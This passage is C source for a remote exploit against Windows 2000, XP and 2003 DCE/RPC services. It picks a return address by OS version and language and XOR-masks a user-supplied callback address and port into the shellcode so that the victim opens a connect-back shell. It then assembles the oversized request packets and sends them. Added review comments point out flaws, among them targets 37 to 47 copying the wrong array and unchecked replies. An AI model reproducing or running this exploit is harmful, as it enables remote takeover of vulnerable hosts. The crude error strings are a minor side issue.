        memcpy(sc+36,win2ksp2chi,sizeof(win2ksp2chi));
    else if (atoi(argv[4])==18)
        memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
    else if (atoi(argv[4])==19)
        memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
    else if (atoi(argv[4])==20)
        memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
    else if (atoi(argv[4])==21)
        memcpy(sc+36,win2knospjap,sizeof(win2knospjap));
    else if (atoi(argv[4])==22)
        memcpy(sc+36,win2ksp1jap,sizeof(win2ksp1jap));
    else if (atoi(argv[4])==23)
        memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
    else if (atoi(argv[4])==24)
        memcpy(sc+36,win2knospkr,sizeof(win2knospkr));
    else if (atoi(argv[4])==25)
        memcpy(sc+36,win2ksp1kr,sizeof(win2ksp1kr));
    else if (atoi(argv[4])==26)
        memcpy(sc+36,win2ksp2kr,sizeof(win2ksp2kr));
    else if (atoi(argv[4])==27)
        memcpy(sc+36,win2knospmx,sizeof(win2knospmx));
    else if (atoi(argv[4])==28)
        memcpy(sc+36,win2ksp1mx,sizeof(win2ksp1mx));
    else if (atoi(argv[4])==29)
        memcpy(sc+36,win2knospken,sizeof(win2knospken));
    else if (atoi(argv[4])==30)
        memcpy(sc+36,win2ksp1ken,sizeof(win2ksp1ken));
    else if (atoi(argv[4])==31)
        memcpy(sc+36,win2ksp2ken,sizeof(win2ksp2ken));
    else if (atoi(argv[4])==32)
        memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
    else if (atoi(argv[4])==33)
        memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
    else if (atoi(argv[4])==34)
        memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
    else if (atoi(argv[4])==35)
        memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
    else if (atoi(argv[4])==36)
        memcpy(sc+36,win2k3nospeng,sizeof(win2k3nospeng));
    /* NOTE(review): from here on the source operand is always win2k3nospeng;
     * only the sizeof() operand names the array the usage banner advertises. */
    else if (atoi(argv[4])==37) 
        memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp3ger));
    else if (atoi(argv[4])==38) 
        memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger1));
    else if (atoi(argv[4])==39) 
        memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4ger2));
    else if (atoi(argv[4])==40) 
        memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1ger));
    else if (atoi(argv[4])==41)
        memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp1fr));
    else if (atoi(argv[4])==42)
        memcpy(sc+36,win2k3nospeng,sizeof(Win2ksp4fr));
    else if (atoi(argv[4])==43)
        memcpy(sc+36,win2k3nospeng,sizeof(winxpsp0fr));
    else if (atoi(argv[4])==44)
        memcpy(sc+36,win2k3nospeng,sizeof(winxpsp1fr));
    else if (atoi(argv[4])==45)
        memcpy(sc+36,win2k3nospeng,sizeof(win2ksp3big));
    else if (atoi(argv[4])==46)
        memcpy(sc+36,win2k3nospeng,sizeof(win2ksp4big));
    else if (atoi(argv[4])==47)
        memcpy(sc+36,win2k3nospeng,sizeof(winxpsp01big));

    /* Callback endpoint.  Port and address are XOR-masked with 0x93 bytes
     * before being stored, matching the "\x80\x30\x93" stub in sc, so the
     * clear-text values never appear in the packet.  inet_addr()'s failure
     * value (INADDR_NONE) is not checked. */
    port1 = htons(atoi(argv[3]));
    port1 ^= 0x9393;
    cb=inet_addr(argv[2]);   
    cb ^= 0x93939393;
    /* Unaligned, type-punned stores into the byte array: accepted by x86/MSVC,
     * but undefined behaviour under strict aliasing rules. */
    *(unsigned short *)&sc[330+0x30] = port1;
    *(unsigned int *)&sc[335+0x30] = cb;
    len=sizeof(sc);          /* assigned here and by recv() below, never read */
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);

    /* request2's two 32-bit counts grow by sizeof(sc)/2 — consistent with
     * UTF-16 character counts for the string that request2, sc and request3
     * form together.  These writes modify the global request2 in place. */
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));          /* includes sc's trailing NUL */
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    /* Length fix-ups inside the request1 region of buf2: each 32-bit field
     * grows by the payload size minus 0xc.  Offset 8 is where the DCE/RPC
     * common header keeps its 16-bit frag_length (adjusted here as a 32-bit
     * value, which also touches the adjacent auth_length bytes if it carries);
     * 0x10 is the alloc_hint; the remaining offsets are presumably NDR
     * conformance/size fields — TODO confirm with a protocol decoder. */
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

    /* Step 1: the DCE/RPC bind. */
    if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
      printf("Send failed pussy.\n");
      exit(1);
    }

    /* The bind reply is read but neither its length nor its contents
     * (bind_ack vs. bind_nak) are examined; a rejected bind is not detected. */
    len=recv(sockfd,buf1,1000,0);
    /* Step 2: the assembled request PDU (len1 bytes of buf2). */
    if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {
            printf("Send failed pussy\n");
            exit (1);
    }
    /* Any response is discarded; the socket is left open for process exit to
     * reclaim and WSACleanup() is never called. */
    len=recv(sockfd,buf1,1024,0);
    return 0;
}